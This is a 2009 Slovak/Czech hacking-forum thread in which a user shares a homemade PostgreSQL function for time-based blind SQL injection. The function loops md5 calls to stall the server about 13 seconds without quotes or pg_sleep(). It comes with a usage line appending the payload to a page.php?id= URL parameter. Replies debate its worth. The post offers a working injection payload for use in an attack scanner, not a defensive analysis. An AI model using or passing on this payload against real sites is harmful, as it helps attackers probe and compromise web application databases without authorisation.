TIME based SQL injcection

HackForum

TIME based SQL injcection#
Caute,

robim vlastny time based SQL injection scanner a tu je moj vlastny kod SLEEP funkcie v PostgreSQL

vlastnosti: ziadne apostrofy, nepotrebne prava jazyka "C", funkcia zaberie na serveri asi 13 sekund. funguje aj na starsich verziach PostgreSQL, ktore nemaju funkciu pg_sleep()

CREATE OR REPLACE FUNCTION my_sleep() RETURNS integer AS $$ DECLARE i integer; BEGIN i:=1000000; WHILE i>0 LOOP PERFORM md5(1); i:=i-1; END LOOP; RETURN 0; END; $$ LANGUAGE plpgsql; SELECT my_sleep();

pouzitie jednoduche: site.com/page.php?id=5; tu_daj_kod

Za par dni pridam dalsie funkcie time based sql injection, ktore este nie su na nete.
(odpovědět)
keso123 | 147.175.187.*11.5.2009 23:43
re: TIME based SQL injcection#
No fuj!
(odpovědět)
Mrkva | 94.127.132.*14.5.2009 22:50
re: TIME based SQL injcection#
Mrkva, to je vsetko? viac si neni schopny komentovat ? Myslim ze funkcia je dobra, na sla.ckers.org mi dakovali...
(odpovědět)
keso123 | 147.175.187.*19.5.2009 14:48
re: TIME based SQL injcection#
keso123: jde hlavne o to, ze s sql jazykem se daji delat daleko lepsi kousky. jenze tady je povedomi tak maximalne o tom, jak se dostat do databaze a vybrat hesla. tady se vi o mysql, ale mssql, postgre, oracle, msql, sqlite a dalsi uz nikomu nic nerikaji. asi proto te nikdo nedokaze ocenit.
(odpovědět)
xaxaxa | 193.200.150.*19.5.2009 16:46

Zpět
 
 
 

 
BBCode